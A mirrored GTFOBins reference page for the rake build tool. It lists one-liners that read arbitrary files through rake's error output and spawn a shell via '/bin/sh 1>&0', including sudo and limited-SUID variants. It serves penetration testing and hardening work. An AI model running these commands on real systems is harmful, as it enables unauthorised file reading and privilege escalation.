This website requires JavaScript.
Explore
Help
Register
Sign In
mirror
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced
2026-01-04 06:41:39 +01:00
Code
Issues
ffc64f101c
GTFOBins.github.io
/
_gtfobins
/
rake.md
LinuxSploit
0b196471f8
Add rake file-read
...
Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
2021-07-17 08:42:47 +02:00
352 B
Raw
Blame
History
functions
file-read
shell
sudo
limited-suid
description
code
The file is actually parsed and the first wrong line is returned in an error message.
LFILE=file-to-read rake -f $LFILE
code
rake -p '`/bin/sh 1>&0`'
code
sudo rake -p '`/bin/sh 1>&0`'
code
./rake -p '`/bin/sh 1>&0`'